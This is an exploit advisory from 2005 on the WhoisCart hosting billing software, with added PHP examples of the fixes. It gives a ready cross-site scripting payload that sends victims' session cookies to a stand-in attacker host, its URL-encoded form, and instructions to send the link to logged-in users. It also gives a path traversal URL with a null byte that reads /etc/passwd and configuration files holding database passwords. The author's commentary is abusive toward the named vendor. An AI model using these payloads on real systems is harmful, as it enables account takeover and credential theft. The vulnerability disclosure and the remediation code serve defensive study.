
whoiscartInsert.txt

Posted Jun 23, 2005
Authored by Elzar Stuffenbach

Saeven.net's WhoisCart is susceptible to an arbitrary javascript injection flaw and also suffers from a directory traversal vulnerability.

tags | exploit, arbitrary, javascript
SHA-256 | 72a4419a90fac45a4e99d532b651a7458d542208ac192cdede294997035ebab7

Subject:
Saeven.net's WhoisCart (all versions released prior to this disclosure) is vulnerable in
two ways: it allows an attacker to inject JavaScript into pages viewed by users (cross-site
scripting), and it allows any world-readable file on the server hosting the WhoisCart
software to be read.


Severity:
Severe. Together these vulnerabilities give an attacker access to essentially any part of
the system: plaintext database passwords can be read from the WhoisCart configuration, and
users' session ID cookies can be stolen and used to take over their accounts.


Preamble:
(Taken from http://www.whoiscart.net/)
Able to remember, and apt at making your life easier - Whois.Cart 2.2 is a hosting and
domains shopping cart and billing management system that will most likely be your best
friend during your domain hosting and registration business venture. Easily skinned
using our versatile theme architecture, with support for over a dozen payment portals,
fourteen different languages, and capable of all billing recurrences; the system is
quickly becoming the most popular and highest rated script in its class [1]. Coded
entirely in PHP, we challenge you to find a system faster than ours. Long-ranked in
Zend's Top 10, and by far the most feature packed software for its price - come and see
why exactly 3155 users just can't be wrong.


Problem:
The first vulnerability, JavaScript injection leading to session ID theft, is exploited
through a request parameter that profile.php reflects into the page without escaping:

http://yourdomain.com/whoiscart/profile.php?page=INSERT_JAVASCRIPT_HERE

Whatever is passed as page is written into the HTML as-is, so any markup in it is rendered
and any script in it runs in the victim's browser. Basically, write a payload that sends
the user's cookies to a server you control, like so:

<body onload="document.form1.c.value=document.cookie;document.form1.submit()"><form name=form1
action=http://yourmaliciousdomain.com/somescript><input type=hidden name=c></form></body>

(form.submit() takes no arguments, so the cookie has to be copied into a form field, here
the hidden input c, before the form is submitted; the receiving script then gets it as the
c parameter.) URL encode it, so it turns into:

%3Cbody+onload%3D%22document.form1.c.value%3Ddocument.cookie%3Bdocument.form1.submit%28%29%22%3E%3Cform+name%3Dform1+action%3Dhttp%3A%2F%2Fyourmaliciousdomain.com%2Fsomescript%3E%3Cinput+type%3Dhidden+name%3Dc%3E%3C%2Fform%3E%3C%2Fbody%3E

Then that URL-encoded payload is inserted at the appropriate location above and the
resulting link is sent to a logged-in user. When the page loads, the user's cookies
(session ID included) arrive at yourmaliciousdomain.com.
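An added example, not WhoisCart's code, of the pattern behind this bug and of the fix for it: a PHP fragment that writes the page parameter into its HTML unescaped, beside one that HTML-encodes it at the point of output. The function names, the markup and the assumption that profile.php echoes the parameter straight into the page are illustrative; the product's actual source is not shown on this page.

```php
<?php
// Added example, not WhoisCart's code. It assumes profile.php echoes the
// page parameter into its HTML; the function names and markup are made up
// to illustrate the pattern.

// Vulnerable: the raw request value is written into the document, so any
// markup in it is rendered and any script in it runs for the viewer.
function render_nav_vulnerable(string $page): string
{
    return '<div class="nav">Current page: ' . $page . '</div>';
}

// Fixed: encode for the HTML context at the point of output. ENT_QUOTES
// also encodes single quotes, so the value is inert inside attributes too;
// ENT_SUBSTITUTE keeps invalid UTF-8 from turning the output into an empty
// string (which would silently drop the value instead of escaping it).
function render_nav_safe(string $page): string
{
    $safe = htmlspecialchars($page, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="nav">Current page: ' . $safe . '</div>';
}

// The advisory's cookie-stealing payload as PHP sees it: $_GET is already
// URL-decoded, so the %3C...%3E form in the link arrives here as '<'...'>'.
$payload = '<body onload="document.form1.c.value=document.cookie;document.form1.submit()">'
         . '<form name=form1 action=http://yourmaliciousdomain.com/somescript>'
         . '<input type=hidden name=c></form></body>';

echo render_nav_vulnerable($payload), "\n"; // the markup goes out live
echo render_nav_safe($payload), "\n";       // every < > " ' & is encoded
```

In the vulnerable output the browser merges the injected `<body onload=...>` attribute into the page's existing body element and runs the handler on load; in the fixed output the same bytes render as visible text. Marking the session cookie HttpOnly is a second, independent layer: document.cookie then no longer contains it, so this particular payload gets nothing even where the escaping is missed.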


Next Problem:
The second vulnerability is a directory traversal in the language parameter. It prints, as
plain text, any world-readable file on the system, including the configuration files
WhoisCart uses to store session IDs and plaintext database passwords:

http://yourdomain.com/whoiscart/?language=../../../../../../../../../../../../../etc/passwd%00

This reads any world-readable file on the server. The trailing %00 appends a null byte:
the application adds a .php suffix to the value, and because the underlying filesystem
calls treat the name as a NUL-terminated C string, everything after the null byte is
ignored and /etc/passwd is opened instead of /etc/passwd.php. (This suffix-stripping trick
works on PHP versions before 5.3.4; from 5.3.4 on, the filesystem functions reject any
path containing a NUL byte. The traversal itself does not depend on it.)
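An added example, not WhoisCart's code, of the include pattern the null byte trick implies and of two ways to close it. The advisory's description (a .php suffix appended to the language value) is consistent with something like include('languages/' . $language . '.php'); that reconstruction, the languages/ directory and the language names in the allow-list are assumptions made for illustration.

```php
<?php
// Added example, not WhoisCart's code. The vulnerable function is a
// reconstruction from the advisory's description (a .php suffix appended to
// the language value); the languages/ directory and the names in the
// allow-list are assumptions.

// Vulnerable: the attacker controls the path. '../' segments walk out of
// languages/, and on PHP < 5.3.4 a NUL byte ends the filename before the
// '.php' suffix is seen, so /etc/passwd is opened instead of /etc/passwd.php.
function language_file_vulnerable(string $language): string
{
    return __DIR__ . '/languages/' . $language . '.php';
}

// Fix 1 (preferred): map the request value onto a fixed allow-list. User
// input never becomes part of a path, so traversal and NUL tricks have
// nothing to act on. Strict comparison so "0" or similar cannot match.
function language_file_safe(string $language): ?string
{
    static $allowed = ['english', 'french', 'german', 'spanish'];
    if (!in_array($language, $allowed, true)) {
        return null; // caller falls back to the default language
    }
    return __DIR__ . '/languages/' . $language . '.php';
}

// Fix 2 (defence in depth when the list is not fixed): accept only a plain
// identifier, then resolve the path and require it to stay under languages/.
function language_file_contained(string $language): ?string
{
    if ($language === '' || preg_match('/[^a-z_]/', $language)) {
        return null; // '.', '/', NUL and anything else non-alphabetic is refused
    }
    $base = realpath(__DIR__ . '/languages');
    if ($base === false) {
        return null; // base directory missing: nothing can be safely included
    }
    $path = realpath($base . '/' . $language . '.php');
    if ($path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null; // file missing, or resolved (e.g. via symlink) outside the base
    }
    return $path;
}

// The advisory's traversal value, NUL byte included, as it reaches the code
// once PHP has decoded the %00 in the query string.
$attack = "../../../../../../../../../../../../../etc/passwd\0";

var_dump(language_file_vulnerable($attack)); // the path escapes languages/ entirely
var_dump(language_file_safe($attack));       // refused: not in the allow-list
var_dump(language_file_contained($attack));  // refused: fails the character check
```

For the advisory's string the character check alone is what stops Fix 2; the realpath containment is there for names that pass the check but still resolve somewhere unexpected, for instance through a symlink dropped into languages/. Fix 1 is the one to prefer: a language is a choice from a known set, and a lookup table never needs to touch the filesystem API with user-supplied bytes.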


Workaround:
Use different software, not written by a 12-year-old (no offense to any kids reading
this, but think about security, for once). The vulnerabilities shown here are indicative
of a truly inferior software product. The product is not even feature complete: the beta
that has been in progress for 2 years can be seen at http://beta.whoiscart.net/admin/,
barely started. Vulnerabilities like this still exist, and have existed throughout the
software since its inception. The only fix for this is for Saeven.net to release a new
product, rewritten from the ground up, or for the consumer to choose a new product
altogether (yes, there are better ones on the market for the same price; try Google). If
a piece of software allows the unauthorized viewing of globally readable files, the
software has already failed, and deserves to be shot down like this.


Vendor Contact:
saeven.net consulting
Alexandre Lemaire (registrations@saeven.net)
1968 Portobello blvd
Orleans
Ontario,K4A 4E0
CA
Tel. +91.226370256 (If you call, careful you don't get his mom)


Disclosure Timeline:
Vendor Notified: June 21, 2005
Public Release: June 22, 2005


About the Author:
The author is a software engineer, with an absolute detestation of bullshit. Sometimes I
detest some languages, because they allow punks like this to write shit software, and
then the dumbass programmer puts up a website, uses the word "innovative", and ends up
ultimately screwing over a few hundred people, who maintain the personal information of
thousands of people. Identity theft starts with "companies" such as this. Choose a
trusted solution. The ability to crunch a few numbers, or execute a few lines of PHP,
does NOT make something trustworthy. A company with a non-fictitious in-house lawyer is
a good start, and then a company who knows what the fuck they're doing when it comes to
software design and implementation is stellar.

It is this type of bullshit I detest, and I advise everyone against using this product,
for numerous reasons, all founded on the same core element: a product is not to be
trusted because of a flashy website, or because some kid lies about his age.


Conclusion:
Here is an email, verbatim from Mr. Lemaire:
<quote>
From: "S. Alexandre M. Lemaire" <saeven@saeven.net>
I'll indulge your comments.

The truth is that I don't maintain the work on whois.cart currently. I
have a staff of 13 people working for me right now, the developments are
intense and I don't have the time to monitor them as I usually would. They
package and operate independently from myself. My user community knows well
(as I post frequent updates in the forums) that I'm currently vested into
our other project, our helpdesk. We have a user base of 3000+, you aren't
the only one to submit bug reports - note also that the people that work for
me, aren't bored teenagers. They are people with M.Scs and PhDs in computer
science and related fields, who've agreed to partake in the whois.cart
project in their spare time initially. Your concern for security is not
exclusive.
</quote>

Show me a person with a Master's or PhD in Computer Science who both works in the
webhosting software industry and writes shit software like this, and I will show you
shit that smells like roses.

--